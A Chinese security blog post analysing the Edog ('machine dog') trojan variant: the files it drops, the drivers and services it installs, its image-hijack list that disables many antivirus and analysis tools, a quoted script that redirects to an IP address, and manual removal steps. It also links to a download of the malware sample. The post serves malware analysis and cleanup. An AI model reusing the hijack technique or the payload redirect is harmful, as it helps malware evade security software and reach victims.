Trojan.Win32.Edog.t(机器狗变种)的分析

File: u.exe
Size: 12,104 字节
Modified: 2008年2月8日, 21:00:12
MD5: MD5: 94732FDF4E53D2DF9B65E593E9571D00
加壳工具:Upack V0.37 -> Dwing

分析:
1,u.exe运行后释放下列文件
C:\WINDOWS\system32\HDDGuard.dll
C:\WINDOWS\system32\TIMPlatform.exe
C:\WINDOWS\system32\WIN.INI
C:\WINDOWS\system32\drivers\ati32srv.sys
C:\WINDOWS\system32\drivers\pcihdd2.sys
C:\Documents and Settings\daokers\Local Settings\Temp\shutdown.ssm

win.inf的内容为
程序代码 程序代码
<script>
location.href="http://202.104.57.161";
</script>


2,添加iCafe Update服务,然后加载pcihdd2.sys
之后U.exe启动C:\WINDOWS\system32\TIMPlatform.exe

3,添加ATI2HDDSRV服务,然后加载ati32srv.sys,之后自删之。
这时我的ssm被病毒结束,这可是第一次遇到直接干掉SSM的毒毒哦。
加载的驱动如图:
点击放大图片


之后开始添加映象劫持,所有的Debugger都指向系统的ntsd.exe
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
apitrap.dll
AppSvc32.exe
ASSTE.dll
autoruns.exe
avconsol.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
AVSTE.dll
CCenter.exe
ccSvcHst.exe
Cleanup.dll
cqw32.exe
divx.dll
divxdec.ax
DJSMAR00.dll
DRMINST.dll
EGHOST.exe
enc98.EXE
EncodeDivXExt.dll
EncryptPatchVer.dll
FileDsty.exe
front.exe
FTCleanerShell.exe
fullsoft.dll
FYFireWall.exe
GBROWSER.DLL
HijackThis.exe
htmlmarq.ocx
htmlmm.ocx
IceSword.exe
install.exe
iparmo.exe
Iparmor.exe
ishscan.dll
isPwdSvc.exe
ISSTE.dll
javai.dll
jvm.dll
jvm_g.dll
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPfwSvc.exe
KRegEx.exe
KRepair.com
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVScan.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KvXP_1.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
MagicSet.exe
main123w.dll
mcconsol.exe
mmqczj.exe
mmsk.exe
mngreg32.exe
msci_uno.dll
mscoree.dll
mscorsvr.dll
mscorwks.dll
msjava.dll
mso.dll
Navapw32.exe
NAVOPTRF.dll
NeVideoFX.dll
nod32.exeNavapsvc.exe
nod32krn.exe
nod32kui.exe
NPFMntor.exe
NPMLIC.dll
NSWSTE.dll
OllyDBG.EXE
OllyICE.EXE
PFW.exe
PFWLiveUpdate.exe
photohse.EXE
PMSTE.dll
ppw32hlp.dll
printhse.EXE
procexp.exe
prwin8.EXE
ps80.EXE
psdmt.exe
qfinder.EXE
QHSET.exe
qpw.EXE
QQDoctor.exe
QQKav.exe
Ras.exe
RavMonD.exe
RavStub.exe
RawCopy.exe
RegClean.exe
RegTool.exe
rfwcfg.exe
rfwmain.exe
rfwProxy.exe
rfwsrv.exe
rfwstub.exe
RsAgent.exe
Rsaupd.exe
runiep.exe
safelive.exe
salwrap.dll
scan32.exe
setup.exe
setup32.dll
sevinst.exe
shcfg32.exe
SmartUp.exe
SREng.EXE
symlcnet.dll
symlcsvc.exe
SysSafe.exe
tcore_ebook.dll
TFDTCTT8.DLL
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
ua80.EXE
udtapi.dll
UIHost.exe
ums.dll
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.exe
vb40032.dll
vbe6.dll
vsstat.exe
webscanx.exe
WoptiClean.exe
wpwin8.EXE
xlmlEN.dll
xwsetup.EXE

4,之后访问xxx.cdev.us(61.140.3.66),找寻下载
点击放大图片

解决办法:
1,打开FileForceKiller,记得选择“注册shell右键菜单”,之后退出,找到C:\WINDOWS\system32\HDDGuard.dll,右键,选择“sucop暴力文件删除”,在打开的页面选择“删除前清理卸载模块”,之后删除。
点击放大图片

点击放大图片
然后依此删除TIMPlatform.exe

或者打开icesword.exe,记得改名
菜单:文件-设置中选择禁止进线程创建。
之后结束TIMPlatform.exe,右键进程栏目中非系统exe,选中“模块信息”,找到HDDGuard.dll,点击“强制解除”。
点击放大图片
解除“禁止进线程创建”,打开费尔木马强力清除助手,把上述的文件选择第二项清除

2,打开autoruns.exe清除映像劫持的信息

3,用C:\WINDOWS\system32\dllcache\userinit.exe覆盖C:\WINDOWS\system32\userinit.exe

4,下载机器狗专杀工具,扫描修复。

5,这个样本并没有从网络中下载木马和病毒,可能作者已停止了

附:
下载文件 点击下载金刀客工具包  (含本文中涉及的所有工具)

   病毒上报信箱: daokers@qq.com

文件名: 080205机器狗变种样本.rar
描述: daokers.com
fs2you下载链接:
[url=http://www.fs2you.com/files/6ce6192e-e169-11dc-bd36-0014221f3995/]点击放大图片[/url]
瑞星扫描结果:
ati32srv.sys   Trojan.DL.Win32.Mnless.xr
TIMPlatform.exe>>upack0.39   Trojan.Win32.Edog.t

文件名: 超级巡警机器狗专杀RodogKiller.zip
文件大小: 548.4 KB
fs2you下载链接:
[url=http://www.fs2you.com/files/d6502dab-e10d-11dc-82de-0014221f3995/]点击放大图片[/url]

文件名: 瑞星机器狗专杀.zip
文件大小:320.0 KB
fs2you下载链接:
[url=http://www.fs2you.com/files/5f6c466b-e10d-11dc-b15e-0014221f4662/]
点击放大图片[/url]

以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2009-05-06 01:53 PM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:


本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.